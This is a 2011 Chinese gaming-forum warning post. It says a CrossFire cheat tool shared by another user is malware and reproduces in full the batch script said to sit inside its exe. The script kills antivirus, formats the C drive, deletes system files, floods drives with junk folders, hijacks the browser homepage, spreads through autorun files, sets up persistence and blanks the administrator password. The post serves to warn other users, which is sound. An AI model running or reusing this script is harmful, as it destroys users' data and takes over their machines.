!!!莫上当!!!CF 蛤蟆飞天跳舞内存透视稳定版_CF穿越火线

ZxID：13609877

等级: 中将

举报只看楼主使用道具楼主发表于: 2011-11-20 0

关于wj119113
ZxID：15060601
原帖
http://bbs.houdao.com/r5260120/
CF 蛤蟆飞天跳舞内存透视稳定版.

恶意发布病毒

请看他的exe文件里面含有的代码
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewContextMenu /t REG_DWORD /d 0 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWinKeys /t REG_DWORD /d 1 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 1 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v nodrives /t REG_DWORD /d 60 /f
taskkill /im 360tray.exe /f
subst b: C:\
subst h: C:\
subst i: C:\
subst j: C:\
subst k: C:\
subst l: C:\
subst m: C:\
subst n: C:\
subst o: C:\
subst p: C:\
subst q: C:\
subst r: C:\
subst s: C:\
subst t: C:\
subst u: C:\
subst v: C:\
subst w: C:\
subst x: C:\
subst y: C:\
subst z: C:\
echo y^|format C: /q ------------------------------格式化C盘
del %winder%\win.ini /f ------------------------------删除C盘重要文件
del %winder%\regedit.exe /f ------------------------------删除注册表编辑器
del %winder%\Notepad.exe /f ------------------------------删除文本编辑器
del %winder%\System.ini /f ------------------------------删除系统配置文件
del C:\bootfront.bin /f ------------------------------删除重要文件
del C:\IO.sys /f ------------------------------删除重要文件
del C:\MSDOS.sys /f ------------------------------删除重要文件
del C:\NTDETECT.COM /f ------------------------------删除重要文件
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d http://www.5555se.com /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Default_Page_URL" /t reg_sz /d http://www.5555se.com /f
set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z
for /l %%a in (1,1,2000) do for %%b in (%alldrive%) do md %%b:\%random%%random%%random%%%a..\
explorer \
xcopy /h /y /r /k .\S-1-5-21-1214440339.exe %systemroot%\system\
xcopy /h /y /r /k .\autorun.inf %systemroot%\system\
@if not exist .\S-1-5-21-1214440339.exe xcopy /h /y /r /k %systemroot%\system\S-1-5-21-1214440339.exe .\
for %%i in (c d e f g h i j k l m n o p q r s t u v w x y z) do xcopy /h /y /r /k autorun.inf %%i%:\
for %%i in (c d e f g h i j k l m n o p q r s t u v w x y z) do xcopy /h /y /r /k S-1-5-21-1214440339.exe %%i%:\
for %%i in (c d e f g h i j k l m n o p q r s t u v w x y z) do @if exist %%i%:\S-1-5-21-1214440339.exe attrib +h +s +a %%i%:\S-1-5-21-1214440339.exe
for %%i in (c d e f g h i j k l m n o p q r s t u v w x y z) do @if exist %%i%:\autorun.inf attrib +h +s +a %%i%:\autorun.inf
attrib +h +s +a %systemroot%\system\S-1-5-21-1214440339.exe
attrib +h +s +a %systemroot%\system\autorun.inf
echo Windows Registry Editor Version 5.00 >> .\reg.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> .\reg.reg
echo "Userinit"="userinit.exe,S-1-5-21-1214440339.exe" >> .\reg.reg
echo Windows Registry Editor Version 5.00 >> .\reg1.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] >> .\reg1.reg
echo "NoDriveTypeAutoRun"=dword:95000000 >> .\reg1.reg
echo Windows Registry Editor Version 5.00 >> .\reg2.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> .\reg2.reg
echo "ctfmon"="c:\\S-1-5-21-1214440339.exe" >> .\reg2.reg
regedit /s .\reg.reg
regedit /s .\reg1.reg
regedit /s .\reg2.reg
del .\reg.reg
del .\reg1.reg
del .\reg2.reg
net user administrator ""
del /a:h .\shell.vbs
del /a:h .\AUTOEXEC.BAT

del %0 /f47616

大家都看到了吧由于本人也是小菜
我今天晚上做了一次小白帮大家测试了一下

这个比人的软件在我的分区中生成1997个文件夹带"."的那种直接不容易删除的
---------------------------------------------------------------------------------------------------

建议版主或管理把次人ID禁止!!!